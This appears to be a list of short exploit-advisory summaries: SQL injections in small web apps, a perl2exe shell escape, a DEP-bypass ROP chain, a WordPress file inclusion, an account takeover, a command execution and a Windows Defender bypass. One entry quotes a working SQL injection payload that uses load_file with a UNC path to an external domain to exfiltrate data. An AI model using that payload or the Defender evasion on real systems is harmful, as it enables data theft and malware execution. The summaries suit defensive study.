perl2exe allows packing Perl scripts into native executables that use the 0th argument to unpack and execute a file. An attacker can leverage this to make the executable run another compiled executable by controlling the 0th argument, enabling them to escape restricted shell environments.
Client Details System 1.0 is vulnerable to SQL Injection through the 'uemail' parameter in the '/clientdetails/' endpoint. An attacker can exploit this vulnerability to compromise the application, access or manipulate data, or target the underlying database for further exploitation.
The Curfew e-Pass Management System 1.0 is vulnerable to SQL injection in the 'FromDate' parameter. By injecting a malicious payload into the 'FromDate' parameter, an attacker can manipulate the SQL query to execute arbitrary SQL commands. This vulnerability has been tested with a time-based blind technique using MySQL version 5.0.12.
The 'email' parameter in dawa-pharma-1.0-2022 is vulnerable to SQL injection attacks. By injecting a malicious payload like '+(select load_file('\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\lhc'))+', an attacker can execute a sub-query to call MySQL's load_file function with a UNC file path pointing to an external domain. This allows the attacker to retrieve clients' sensitive information and access server data.
The exploit bypasses Data Execution Prevention (DEP) in A-PDF All to MP3 Converter version 2.0.0 by utilizing a ROP chain built on HeapCreate, HeapAlloc, and some_memory_copy_function. By manipulating specific parameters and memory allocations, an attacker can execute arbitrary code on the target system.
The Local File Inclusion vulnerability in WordPress WP Rocket Plugin allows an attacker to include local files from the target website, potentially exposing sensitive information like database credentials and enabling a complete database takeover. This issue was fixed in version 2.10.4.
The exploit allows an attacker to perform an Account Takeover by manipulating the 'id' parameter in the URL of the 'Users.php?f=save' endpoint in Lost and Found Information System v1.0. By changing the 'id' parameter, an attacker can access other user accounts without proper authorization. This vulnerability has been assigned CVE-2023-38965.
The Easywall 0.3.1 software is prone to an authenticated remote command execution vulnerability. By exploiting this issue, a remote attacker who has authenticated access to the application can execute arbitrary commands on the target system. This can lead to complete compromise of the system.
Windows Defender usually prevents the execution of TrojanWin32Powessere.G, which leverages rundll32.exe. However, by using multiple commas in the execution command, the mitigation can be bypassed, allowing successful execution of the trojan.
The exploit allows an attacker to perform SQL injection in the Enrollment System v1.0 application by manipulating the 'emc' parameter in the '/get_subject.php' URI. By injecting a crafted payload, an attacker can retrieve sensitive information from the database. This vulnerability has a CVE identifier.